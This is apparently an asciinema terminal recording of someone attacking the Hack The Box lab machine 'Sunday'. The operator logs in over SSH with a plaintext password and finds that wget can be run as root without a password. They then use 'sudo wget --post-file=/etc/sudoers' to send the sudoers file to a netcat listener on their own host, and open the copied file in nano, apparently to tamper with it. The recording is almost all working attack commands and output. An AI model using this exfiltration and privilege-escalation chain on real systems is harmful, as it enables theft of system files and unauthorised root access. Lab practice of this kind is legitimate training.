{"version": 2, "width": 236, "height": 100, "timestamp": 1662220020, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.019646, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[0.250187, "o", "t"]
[0.342207, "o", "m"]
[0.64538, "o", "u"]
[1.078371, "o", "x"]
[1.21946, "o", " "]
[1.374557, "o", "-"]
[1.945191, "o", "\b\u001b[K"]
[2.148317, "o", "n"]
[2.19872, "o", "e"]
[2.2563, "o", "w"]
[2.343649, "o", " "]
[2.467755, "o", "-"]
[2.59044, "o", "s"]
[2.774426, "o", " "]
[4.237398, "o", "s"]
[4.410766, "o", "u"]
[4.506649, "o", "d"]
[4.641363, "o", "o"]
[4.700856, "o", "e"]
[4.786701, "o", "r"]
[4.95551, "o", "s"]
[5.139358, "o", "\r\n"]
[5.139389, "o", "\u001b[?2004l\r"]
[5.150686, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;100r\u001b[>c\u001b[>q\u001b[1;1H\u001b[?1006h\u001b[?1002h"]
[5.159975, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[sudoers] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H"]
[5.160271, "o", "\u001b[?7727h"]
[5.16064, "o", "\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;100r\u001b[1;1H\u001b[?1006h\u001b[?1002h"]
[5.167062, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[sudoers] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H"]
[5.193301, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[8.475323, "o", "\u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m"]
[8.508275, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p \u001b(B\u001b[m\u001b[30m\u001b[43m22022\u001b[39m\u001b[49m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[2;56H\u001b[?2004l"]
[8.811794, "o", "\u001b]52;;MjIwMjI=\u0007\u001b[C\u001b[?2004h"]
[8.812527, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[2;57H\u001b[5Gsshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\r\n\u001b[?2004l"]
[9.782882, "o", "Last login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\r\n"]
[9.783247, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[100d[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[4;1H"]
[9.784874, "o", "Oracle Corporation      SunOS 5.11      11.4    Aug 2018\r\n"]
[9.791704, "o", "-bash-4.4$ "]
[10.222057, "o", "s"]
[10.280321, "o", "u"]
[10.423629, "o", "d"]
[10.525095, "o", "o"]
[10.647721, "o", " "]
[10.746702, "o", "-"]
[10.827382, "o", "l"]
[10.946724, "o", "\r\n"]
[10.95471, "o", "User sammy may run the following commands on sunday:\r\n    (ALL) ALL\r\n    (root) NOPASSWD: /usr/bin/wget\r\n"]
[10.955862, "o", "-bash-4.4$ "]
[14.567881, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[94m\u001b[1;1H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunO"]
[14.56796, "o", "S 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[51;1H\u001b[?25l\u001b[A──────────────────────────────"]
[14.568514, "o", "─────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:tmux*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[51;1H"]
[14.61036, "o", "\u001b[9d-bash-4.4$ \u001b[K\u001b[51;1H\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[15.51915, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[15.519329, "o", "\u001b[52;5Hn"]
[15.640455, "o", "c"]
[15.741291, "o", " "]
[15.82431, "o", "-"]
[15.995261, "o", "n"]
[16.081493, "o", "v"]
[16.19761, "o", "l"]
[16.242496, "o", "p"]
[16.464393, "o", " "]
[16.551736, "o", "4"]
[16.721688, "o", "4"]
[16.896346, "o", "4"]
[17.045648, "o", "4"]
[17.143487, "o", " "]
[17.360732, "o", ">"]
[17.599446, "o", " "]
[17.673051, "o", "s"]
[17.796499, "o", "u"]
[17.850477, "o", "d"]
[18.612364, "o", "o"]
[18.818569, "o", "e"]
[18.908703, "o", "r"]
[19.068858, "o", "s"]
[19.721491, "o", "_"]
[19.953977, "o", "o"]
[20.075608, "o", "g"]
[20.155497, "o", "\r\n\u001b[?2004l"]
[20.158223, "o", "Ncat: Version 7.92 ( https://nmap.org/ncat )\r\nNcat: Listening on :::4444\r\nNcat: Listening on 0.0.0.0:4444\r\n"]
[23.143453, "o", "\u001b[?25l\u001b[6A\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:nc*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                        23:47\u001b(B\u001b[m\u001b[?12l\u001b[?2"]
[23.143853, "o", "5h\u001b[9;12H"]
[23.144706, "o", "\u001b[?25l\u001b[50;1H\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:47\u001b(B\u001b[m\u001b[?12l\u001b"]
[23.144939, "o", "[?25h\u001b[9;12H"]
[23.548171, "o", "sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.31:4444"]
[23.617741, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/sudoers \u001b[30m\u001b[43m10.10.14.31:4444\u001b[39m\u001b[49m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[33m──────────────────────────────────────────────────────────────────────────────────────"]
[23.618837, "o", "─────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[9;71H"]
[23.918858, "o", "\u001b]52;;MTAuMTAuMTQuMzE6NDQ0NA==\u0007\u001b[C"]
[23.919379, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.31:4444\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32m────────────────────────────────────────────────────────────────────────────────────────────"]
[23.91948, "o", "───────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:[tmux]*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[9;72H"]
[23.960609, "o", "\r\n"]
[23.982634, "o", "--2022-09-03 15:47:29--  http://10.10.14.31:4444/\r\nConnecting to 10.10.14.31:4444... "]
[24.023804, "o", "\u001b[56;1HNcat: Connection from 10.10.10.76.\r\nNcat: Connection from 10.10.10.76:33516.\u001b[11;35Hconnected.\r\nHTTP request sent, awaiting response... "]
[25.308394, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[25.308619, "o", "\u001b[58;1H"]
[25.309262, "o", "\u001b[?25l\u001b[8A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:nc*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                        23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5"]
[25.309326, "o", "8;1H"]
[25.649428, "o", "^C"]
[25.650113, "o", "\r\n"]
[25.650346, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[25.692439, "o", "\u001b[12;41HNo data received.\r\nRetrying.\u001b[60;5H"]
[26.411078, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[26.411157, "o", "\u001b[60;5H"]
[26.411457, "o", "n"]
[26.691854, "o", "\u001b[15;1H--2022-09-03 15:47:32--  (try: 2)  http://10.10.14.31:4444/\r\nConnecting to 10.10.14.31:4444... \u001b[60;6H"]
[26.734575, "o", "\u001b[16;35Hfailed: Connection refused.\u001b[60;6H"]
[26.74323, "o", "\u001b[17;1H-bash-4.4$ \u001b[60;6H"]
[26.783375, "o", "\b\u001b[K"]
[26.900084, "o", "c"]
[26.978902, "o", "p"]
[27.0895, "o", " "]
[27.263488, "o", "s"]
[27.364549, "o", "u"]
[27.489131, "o", "doers"]
[28.084114, "o", " "]
[28.227209, "o", "s"]
[28.332195, "o", "u"]
[28.449605, "o", "doers"]
[29.514015, "o", "_"]
[29.709298, "o", "o"]
[29.849597, "o", "g"]
[32.281412, "o", "\b\u001b[K"]
[32.782518, "o", "\b\u001b[K"]
[32.832969, "o", "\b\u001b[K"]
[32.882052, "o", "\b\u001b[K"]
[32.933074, "o", "\b\u001b[K"]
[32.983069, "o", "\b\u001b[K"]
[33.033728, "o", "\b\u001b[K"]
[33.083934, "o", "\b\u001b[K"]
[33.134221, "o", "\b\u001b[K"]
[33.258451, "o", "\b\u001b[K"]
[33.437567, "o", "\b\u001b[K"]
[33.649789, "o", "_"]
[33.882688, "o", "o"]
[33.994525, "o", "g"]
[34.138672, "o", " "]
[34.376179, "o", "s"]
[34.542027, "o", "u"]
[34.584432, "o", "d"]
[35.203595, "o", "o"]
[35.279407, "o", "e"]
[35.340749, "o", "r"]
[35.483229, "o", "s"]
[35.553363, "o", "\r\n\u001b[?2004l"]
[35.560647, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[36.201137, "o", "n"]
[36.276093, "o", "a"]
[36.378502, "o", "n"]
[36.450897, "o", "o"]
[36.460238, "o", " "]
[36.740536, "o", "s"]
[36.861854, "o", "u"]
[36.970566, "o", "doers"]
[38.067261, "o", "\r\n\u001b[?2004l"]
[38.068072, "o", "\u001b[?25l\u001b[13A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:nano*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:47\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b["]
[38.068167, "o", "63;1H"]
[38.071361, "o", "\u001b[?2004h"]
[38.071619, "o", "\u001b[?25l\u001b[12A\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[48A\u001b[?25l"]
